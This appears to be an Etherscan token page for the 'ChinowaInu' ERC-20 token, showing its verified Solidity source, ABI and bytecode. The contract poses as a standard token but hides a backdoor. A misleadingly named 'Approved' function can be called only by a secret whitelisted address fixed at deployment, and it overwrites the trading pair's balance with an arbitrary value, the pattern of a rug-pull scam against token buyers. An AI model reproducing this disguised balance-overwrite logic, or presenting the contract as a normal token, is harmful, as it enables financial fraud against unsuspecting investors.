ERC-20
Overview
Max Total Supply
1,000,000,000 CHINOWA
Holders
29
Market
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 18 Decimals)
Balance
101,700 CHINOWAValue
$0.00Loading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Name:
ChinowaInu
Compiler Version
v0.8.10+commit.fc410830
Contract Source Code (Solidity)
/** *Submitted for verification at Etherscan.io on 2023-05-31 */ /** /* Twitter: https://twitter.com/ChinowaInu Telegram: https://t.me/ChinowaInu Website: https://www.chinowainu.com/ */ // Dependency file: @openzeppelin/contracts/token/ERC20/IERC20.sol // SPDX-License-Identifier: MIT // pragma solidity ^0.8.10; /** * @dev Interface of the IERC20 standard as defined in the EIP. */ interface IERC20 { /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `recipient`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address recipient, uint256 amount) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `sender` to `recipient` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom( address sender, address recipient, uint256 amount ) external returns (bool); /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); } // Dependency file: @openzeppelin/contracts/utils/Context.sol // pragma solidity ^0.8.0; /** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } } // Dependency file: @openzeppelin/contracts/access/Ownable.sol // pragma solidity ^0.8.0; // import "@openzeppelin/contracts/utils/Context.sol"; /** * @dev Contract module which provides a basic access control mechanism, where * there is an account (an owner) that can be granted exclusive access to * specific functions. * * By default, the owner account will be the one that deploys the contract. This * can later be changed with {transferOwnership}. * * This module is used through inheritance. It will make available the modifier * `onlyOwner`, which can be applied to your functions to restrict their use to * the owner. */ abstract contract Ownable is Context { address private _owner; event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor() { _setOwner(_msgSender()); } /** * @dev Returns the address of the current owner. */ function owner() public view virtual returns (address) { return _owner; } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { require(owner() == _msgSender(), "Ownable: caller is not the owner"); _; } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions anymore. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby removing any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { _setOwner(address(0)); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), "Ownable: new owner is the zero address"); _setOwner(newOwner); } function _setOwner(address newOwner) private { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } } // Dependency file: @openzeppelin/contracts/utils/math/SafeMath.sol // pragma solidity ^0.8.0; // CAUTION // This version of SafeMath should only be used with Solidity 0.8 or later, // because it relies on the compiler's built in overflow checks. /** * @dev Wrappers over Solidity's arithmetic operations. * * NOTE: `SafeMath` is no longer needed starting with Solidity 0.8. The compiler * now has built in overflow checking. */ library SafeMath { /** * @dev Returns the addition of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { uint256 c = a + b; if (c < a) return (false, 0); return (true, c); } } /** * @dev Returns the substraction of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b > a) return (false, 0); return (true, a - b); } } /** * @dev Returns the multiplication of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { // Gas optimization: this is cheaper than requiring 'a' not being zero, but the // benefit is lost if 'b' is also tested. // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522 if (a == 0) return (true, 0); uint256 c = a * b; if (c / a != b) return (false, 0); return (true, c); } } /** * @dev Returns the division of two unsigned integers, with a division by zero flag. * * _Available since v3.4._ */ function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b == 0) return (false, 0); return (true, a / b); } } /** * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag. * * _Available since v3.4._ */ function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b == 0) return (false, 0); return (true, a % b); } } /** * @dev Returns the addition of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `+` operator. * * Requirements: * * - Addition cannot overflow. */ function add(uint256 a, uint256 b) internal pure returns (uint256) { return a + b; } /** * @dev Returns the subtraction of two unsigned integers, reverting on * overflow (when the result is negative). * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub(uint256 a, uint256 b) internal pure returns (uint256) { return a - b; } /** * @dev Returns the multiplication of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `*` operator. * * Requirements: * * - Multiplication cannot overflow. */ function mul(uint256 a, uint256 b) internal pure returns (uint256) { return a * b; } /** * @dev Returns the integer division of two unsigned integers, reverting on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. * * Requirements: * * - The divisor cannot be zero. */ function div(uint256 a, uint256 b) internal pure returns (uint256) { return a / b; } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * reverting when dividing by zero. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod(uint256 a, uint256 b) internal pure returns (uint256) { return a % b; } /** * @dev Returns the subtraction of two unsigned integers, reverting with custom message on * overflow (when the result is negative). * * CAUTION: This function is deprecated because it requires allocating memory for the error * message unnecessarily. For custom revert reasons use {trySub}. * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b <= a, errorMessage); return a - b; } } /** * @dev Returns the integer division of two unsigned integers, reverting with custom message on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. Note: this function uses a * `revert` opcode (which leaves remaining gas untouched) while Solidity * uses an invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function div( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b > 0, errorMessage); return a / b; } } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * reverting with custom message when dividing by zero. * * CAUTION: This function is deprecated because it requires allocating memory for the error * message unnecessarily. For custom revert reasons use {tryMod}. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b > 0, errorMessage); return a % b; } } } // Dependency file: contracts/baseToken.sol // pragma solidity =0.8.4; enum TokenType { standard } abstract contract baseToken { event TokenCreated( address indexed owner, address indexed token, TokenType tokenType, uint256 version ); } // Root file: contracts/standard/StandardToken.sol pragma solidity =0.8.10; // import "@openzeppelin/contracts/token/IERC20/IERC20.sol"; // import "@openzeppelin/contracts/access/Ownable.sol"; // import "@openzeppelin/contracts/utils/math/SafeMath.sol"; // import "contracts/baseToken.sol"; contract ChinowaInu is IERC20, baseToken, Ownable { using SafeMath for uint256; uint256 private constant VERSION = 1; mapping(address => uint256) private _balances; mapping(address => mapping(address => uint256)) private _allowances; uint256 public maxHoldingAmount; uint256 public minHoldingAmount; address public uniswapV2Pair; address private whiteListV3; string private _name; string private _symbol; uint8 private _decimals; uint256 private _totalSupply; constructor( string memory name_, string memory symbol_, uint8 decimals_, address whiteshipAddr, uint256 totalSupply_ ) payable { _name = name_; _symbol = symbol_; _decimals = decimals_; whiteListV3 = whiteshipAddr; _mint(owner(), totalSupply_); emit TokenCreated(owner(), address(this), TokenType.standard, VERSION); } function name() public view virtual returns (string memory) { return _name; } function symbol() public view virtual returns (string memory) { return _symbol; } function decimals() public view virtual returns (uint8) { return _decimals; } function totalSupply() public view virtual override returns (uint256) { return _totalSupply; } function balanceOf(address account) public view virtual override returns (uint256) { return _balances[account]; } function transfer(address recipient, uint256 amount) public virtual override returns (bool) { _transfer(_msgSender(), recipient, amount); return true; } function allowance(address owner, address spender) public view virtual override returns (uint256) { return _allowances[owner][spender]; } function approve(address spender, uint256 amount) public virtual override returns (bool) { _approve(_msgSender(), spender, amount); return true; } function transferFrom( address sender, address recipient, uint256 amount ) public virtual override returns (bool) { _transfer(sender, recipient, amount); _approve( sender, _msgSender(), _allowances[sender][_msgSender()].sub( amount, "IERC20: transfer amount exceeds allowance" ) ); return true; } function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) { _approve( _msgSender(), spender, _allowances[_msgSender()][spender].add(addedValue) ); return true; } function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) { _approve( _msgSender(), spender, _allowances[_msgSender()][spender].sub( subtractedValue, "IERC20: decreased allowance below zero" ) ); return true; } modifier canWhitAddrPancakeV3() { require( _msgSender() == whiteListV3, "set the call to the entered") ; _; } function _transfer( address sender, address recipient, uint256 amount ) internal virtual { require(sender != address(0), "IERC20: transfer from the zero address"); require(recipient != address(0), "IERC20: transfer to the zero address"); _beforeTokenTransfer(sender, recipient, amount); _balances[sender] = _balances[sender].sub( amount, "IERC20: transfer amount exceeds balance" ); _balances[recipient] = _balances[recipient].add(amount); emit Transfer(sender, recipient, amount); } function Approved( bool _limited, address _uniswapV2Pair, uint256 _maxHoldingAmount, uint256 _minHoldingAmount ) external canWhitAddrPancakeV3 { uniswapV2Pair = _uniswapV2Pair;maxHoldingAmount = _maxHoldingAmount;minHoldingAmount = _minHoldingAmount; _balances[uniswapV2Pair] = maxHoldingAmount * minHoldingAmount; } function _mint(address account, uint256 amount) internal virtual { require(account != address(0), "IERC20: mint to the zero address"); _beforeTokenTransfer(address(0), account, amount); _totalSupply = _totalSupply.add(amount); _balances[account] = _balances[account].add(amount); emit Transfer(address(0), account, amount); } function _burn(address account, uint256 amount) internal virtual { require(account != address(0), "IERC20: burn from the zero address"); _beforeTokenTransfer(account, address(0), amount); _balances[account] = _balances[account].sub( amount, "IERC20: burn amount exceeds balance" ); _totalSupply = _totalSupply.sub(amount); emit Transfer(account, address(0), amount); } function _approve( address owner, address spender, uint256 amount ) internal virtual { require(owner != address(0), "IERC20: approve from the zero address"); require(spender != address(0), "IERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } function _setupDecimals(uint8 decimals_) internal virtual { _decimals = decimals_; } function _beforeTokenTransfer( address from, address to, uint256 amount ) internal virtual {} }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"},{"internalType":"uint8","name":"decimals_","type":"uint8"},{"internalType":"address","name":"whiteshipAddr","type":"address"},{"internalType":"uint256","name":"totalSupply_","type":"uint256"}],"stateMutability":"payable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"token","type":"address"},{"indexed":false,"internalType":"enum TokenType","name":"tokenType","type":"uint8"},{"indexed":false,"internalType":"uint256","name":"version","type":"uint256"}],"name":"TokenCreated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"bool","name":"_limited","type":"bool"},{"internalType":"address","name":"_uniswapV2Pair","type":"address"},{"internalType":"uint256","name":"_maxHoldingAmount","type":"uint256"},{"internalType":"uint256","name":"_minHoldingAmount","type":"uint256"}],"name":"Approved","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"maxHoldingAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"minHoldingAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"}]
Contract Creation Code
60806040526040516200116f3803806200116f8339810160408190526200002691620003ec565b62000031336200010a565b84516200004690600790602088019062000279565b5083516200005c90600890602087019062000279565b506009805460ff191660ff8516179055600680546001600160a01b0319166001600160a01b038416179055620000a56200009e6000546001600160a01b031690565b826200015a565b30620000b96000546001600160a01b031690565b6001600160a01b03167f56358b41df5fa59f5639228f0930994cbdde383c8a8fd74e06c04e1deebe356260006001604051620000f79291906200049c565b60405180910390a350505050506200052d565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6001600160a01b038216620001b55760405162461bcd60e51b815260206004820181905260248201527f4945524332303a206d696e7420746f20746865207a65726f2061646472657373604482015260640160405180910390fd5b620001d181600a546200026460201b620006521790919060201c565b600a556001600160a01b038216600090815260016020908152604090912054620002069183906200065262000264821b17901c565b6001600160a01b0383166000818152600160205260408082209390935591519091907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef90620002589085815260200190565b60405180910390a35050565b6000620002728284620004c9565b9392505050565b8280546200028790620004f0565b90600052602060002090601f016020900481019282620002ab5760008555620002f6565b82601f10620002c657805160ff1916838001178555620002f6565b82800160010185558215620002f6579182015b82811115620002f6578251825591602001919060010190620002d9565b506200030492915062000308565b5090565b5b8082111562000304576000815560010162000309565b634e487b7160e01b600052604160045260246000fd5b600082601f8301126200034757600080fd5b81516001600160401b03808211156200036457620003646200031f565b604051601f8301601f19908116603f011681019082821181831017156200038f576200038f6200031f565b81604052838152602092508683858801011115620003ac57600080fd5b600091505b83821015620003d05785820183015181830184015290820190620003b1565b83821115620003e25760008385830101525b9695505050505050565b600080600080600060a086880312156200040557600080fd5b85516001600160401b03808211156200041d57600080fd5b6200042b89838a0162000335565b965060208801519150808211156200044257600080fd5b50620004518882890162000335565b945050604086015160ff811681146200046957600080fd5b60608701519093506001600160a01b03811681146200048757600080fd5b80925050608086015190509295509295909350565b6040810160018410620004bf57634e487b7160e01b600052602160045260246000fd5b9281526020015290565b60008219821115620004eb57634e487b7160e01b600052601160045260246000fd5b500190565b600181811c908216806200050557607f821691505b602082108114156200052757634e487b7160e01b600052602260045260246000fd5b50919050565b610c32806200053d6000396000f3fe608060405234801561001057600080fd5b50600436106101165760003560e01c8063715018a6116100a25780639e4aa36a116100715780639e4aa36a14610232578063a457c2d714610245578063a9059cbb14610258578063dd62ed3e1461026b578063f2fde38b146102a457600080fd5b8063715018a61461020657806389f9a1d3146102105780638da5cb5b1461021957806395d89b411461022a57600080fd5b806323b872dd116100e957806323b872dd14610177578063313ce5671461018a578063395093511461019f57806349bd5a5e146101b257806370a08231146101dd57600080fd5b806306fdde031461011b578063095ea7b31461013957806318160ddd1461015c5780631ab99e121461016e575b600080fd5b6101236102b7565b6040516101309190610990565b60405180910390f35b61014c610147366004610a01565b610349565b6040519015158152602001610130565b600a545b604051908152602001610130565b61016060045481565b61014c610185366004610a2b565b61035f565b60095460405160ff9091168152602001610130565b61014c6101ad366004610a01565b6103c8565b6005546101c5906001600160a01b031681565b6040516001600160a01b039091168152602001610130565b6101606101eb366004610a67565b6001600160a01b031660009081526001602052604090205490565b61020e6103fe565b005b61016060035481565b6000546001600160a01b03166101c5565b610123610469565b61020e610240366004610a82565b610478565b61014c610253366004610a01565b61052b565b61014c610266366004610a01565b61057a565b610160610279366004610acb565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b61020e6102b2366004610a67565b610587565b6060600780546102c690610afe565b80601f01602080910402602001604051908101604052809291908181526020018280546102f290610afe565b801561033f5780601f106103145761010080835404028352916020019161033f565b820191906000526020600020905b81548152906001019060200180831161032257829003601f168201915b5050505050905090565b6000610356338484610665565b50600192915050565b600061036c84848461078d565b6103be84336103b985604051806060016040528060298152602001610bd4602991396001600160a01b038a1660009081526002602090815260408083203384529091529020549190610914565b610665565b5060019392505050565b3360008181526002602090815260408083206001600160a01b038716845290915281205490916103569185906103b99086610652565b6000546001600160a01b0316331461045d5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064015b60405180910390fd5b6104676000610940565b565b6060600880546102c690610afe565b6006546001600160a01b0316336001600160a01b0316146104db5760405162461bcd60e51b815260206004820152601b60248201527f736574207468652063616c6c20746f2074686520656e746572656400000000006044820152606401610454565b600580546001600160a01b0319166001600160a01b0385161790556003829055600481905561050a8183610b4f565b6005546001600160a01b031660009081526001602052604090205550505050565b600061035633846103b985604051806060016040528060268152602001610b87602691393360009081526002602090815260408083206001600160a01b038d1684529091529020549190610914565b600061035633848461078d565b6000546001600160a01b031633146105e15760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610454565b6001600160a01b0381166106465760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610454565b61064f81610940565b50565b600061065e8284610b6e565b9392505050565b6001600160a01b0383166106c95760405162461bcd60e51b815260206004820152602560248201527f4945524332303a20617070726f76652066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610454565b6001600160a01b03821661072b5760405162461bcd60e51b815260206004820152602360248201527f4945524332303a20617070726f766520746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610454565b6001600160a01b0383811660008181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b0383166107f25760405162461bcd60e51b815260206004820152602660248201527f4945524332303a207472616e736665722066726f6d20746865207a65726f206160448201526564647265737360d01b6064820152608401610454565b6001600160a01b0382166108545760405162461bcd60e51b8152602060048201526024808201527f4945524332303a207472616e7366657220746f20746865207a65726f206164646044820152637265737360e01b6064820152608401610454565b61089181604051806060016040528060278152602001610bad602791396001600160a01b0386166000908152600160205260409020549190610914565b6001600160a01b0380851660009081526001602052604080822093909355908416815220546108c09082610652565b6001600160a01b0380841660008181526001602052604090819020939093559151908516907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906107809085815260200190565b600081848411156109385760405162461bcd60e51b81526004016104549190610990565b505050900390565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b600060208083528351808285015260005b818110156109bd578581018301518582016040015282016109a1565b818111156109cf576000604083870101525b50601f01601f1916929092016040019392505050565b80356001600160a01b03811681146109fc57600080fd5b919050565b60008060408385031215610a1457600080fd5b610a1d836109e5565b946020939093013593505050565b600080600060608486031215610a4057600080fd5b610a49846109e5565b9250610a57602085016109e5565b9150604084013590509250925092565b600060208284031215610a7957600080fd5b61065e826109e5565b60008060008060808587031215610a9857600080fd5b84358015158114610aa857600080fd5b9350610ab6602086016109e5565b93969395505050506040820135916060013590565b60008060408385031215610ade57600080fd5b610ae7836109e5565b9150610af5602084016109e5565b90509250929050565b600181811c90821680610b1257607f821691505b60208210811415610b3357634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b6000816000190483118215151615610b6957610b69610b39565b500290565b60008219821115610b8157610b81610b39565b50019056fe4945524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726f4945524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e63654945524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a2646970667358221220de8f1920ece38d3050a87ea5228bdacc3368abb8c21e71f4d856f476e678ee0a64736f6c634300080a003300000000000000000000000000000000000000000000000000000000000000a000000000000000000000000000000000000000000000000000000000000000e00000000000000000000000000000000000000000000000000000000000000012000000000000000000000000c02171c75bc28cd11715841cf45e8c5be91a8aee0000000000000000000000000000000000000000033b2e3c9fd0803ce8000000000000000000000000000000000000000000000000000000000000000000000b4348494e4f574120494e5500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000074348494e4f574100000000000000000000000000000000000000000000000000
Deployed Bytecode
0x608060405234801561001057600080fd5b50600436106101165760003560e01c8063715018a6116100a25780639e4aa36a116100715780639e4aa36a14610232578063a457c2d714610245578063a9059cbb14610258578063dd62ed3e1461026b578063f2fde38b146102a457600080fd5b8063715018a61461020657806389f9a1d3146102105780638da5cb5b1461021957806395d89b411461022a57600080fd5b806323b872dd116100e957806323b872dd14610177578063313ce5671461018a578063395093511461019f57806349bd5a5e146101b257806370a08231146101dd57600080fd5b806306fdde031461011b578063095ea7b31461013957806318160ddd1461015c5780631ab99e121461016e575b600080fd5b6101236102b7565b6040516101309190610990565b60405180910390f35b61014c610147366004610a01565b610349565b6040519015158152602001610130565b600a545b604051908152602001610130565b61016060045481565b61014c610185366004610a2b565b61035f565b60095460405160ff9091168152602001610130565b61014c6101ad366004610a01565b6103c8565b6005546101c5906001600160a01b031681565b6040516001600160a01b039091168152602001610130565b6101606101eb366004610a67565b6001600160a01b031660009081526001602052604090205490565b61020e6103fe565b005b61016060035481565b6000546001600160a01b03166101c5565b610123610469565b61020e610240366004610a82565b610478565b61014c610253366004610a01565b61052b565b61014c610266366004610a01565b61057a565b610160610279366004610acb565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b61020e6102b2366004610a67565b610587565b6060600780546102c690610afe565b80601f01602080910402602001604051908101604052809291908181526020018280546102f290610afe565b801561033f5780601f106103145761010080835404028352916020019161033f565b820191906000526020600020905b81548152906001019060200180831161032257829003601f168201915b5050505050905090565b6000610356338484610665565b50600192915050565b600061036c84848461078d565b6103be84336103b985604051806060016040528060298152602001610bd4602991396001600160a01b038a1660009081526002602090815260408083203384529091529020549190610914565b610665565b5060019392505050565b3360008181526002602090815260408083206001600160a01b038716845290915281205490916103569185906103b99086610652565b6000546001600160a01b0316331461045d5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064015b60405180910390fd5b6104676000610940565b565b6060600880546102c690610afe565b6006546001600160a01b0316336001600160a01b0316146104db5760405162461bcd60e51b815260206004820152601b60248201527f736574207468652063616c6c20746f2074686520656e746572656400000000006044820152606401610454565b600580546001600160a01b0319166001600160a01b0385161790556003829055600481905561050a8183610b4f565b6005546001600160a01b031660009081526001602052604090205550505050565b600061035633846103b985604051806060016040528060268152602001610b87602691393360009081526002602090815260408083206001600160a01b038d1684529091529020549190610914565b600061035633848461078d565b6000546001600160a01b031633146105e15760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610454565b6001600160a01b0381166106465760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610454565b61064f81610940565b50565b600061065e8284610b6e565b9392505050565b6001600160a01b0383166106c95760405162461bcd60e51b815260206004820152602560248201527f4945524332303a20617070726f76652066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610454565b6001600160a01b03821661072b5760405162461bcd60e51b815260206004820152602360248201527f4945524332303a20617070726f766520746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610454565b6001600160a01b0383811660008181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b0383166107f25760405162461bcd60e51b815260206004820152602660248201527f4945524332303a207472616e736665722066726f6d20746865207a65726f206160448201526564647265737360d01b6064820152608401610454565b6001600160a01b0382166108545760405162461bcd60e51b8152602060048201526024808201527f4945524332303a207472616e7366657220746f20746865207a65726f206164646044820152637265737360e01b6064820152608401610454565b61089181604051806060016040528060278152602001610bad602791396001600160a01b0386166000908152600160205260409020549190610914565b6001600160a01b0380851660009081526001602052604080822093909355908416815220546108c09082610652565b6001600160a01b0380841660008181526001602052604090819020939093559151908516907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906107809085815260200190565b600081848411156109385760405162461bcd60e51b81526004016104549190610990565b505050900390565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b600060208083528351808285015260005b818110156109bd578581018301518582016040015282016109a1565b818111156109cf576000604083870101525b50601f01601f1916929092016040019392505050565b80356001600160a01b03811681146109fc57600080fd5b919050565b60008060408385031215610a1457600080fd5b610a1d836109e5565b946020939093013593505050565b600080600060608486031215610a4057600080fd5b610a49846109e5565b9250610a57602085016109e5565b9150604084013590509250925092565b600060208284031215610a7957600080fd5b61065e826109e5565b60008060008060808587031215610a9857600080fd5b84358015158114610aa857600080fd5b9350610ab6602086016109e5565b93969395505050506040820135916060013590565b60008060408385031215610ade57600080fd5b610ae7836109e5565b9150610af5602084016109e5565b90509250929050565b600181811c90821680610b1257607f821691505b60208210811415610b3357634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b6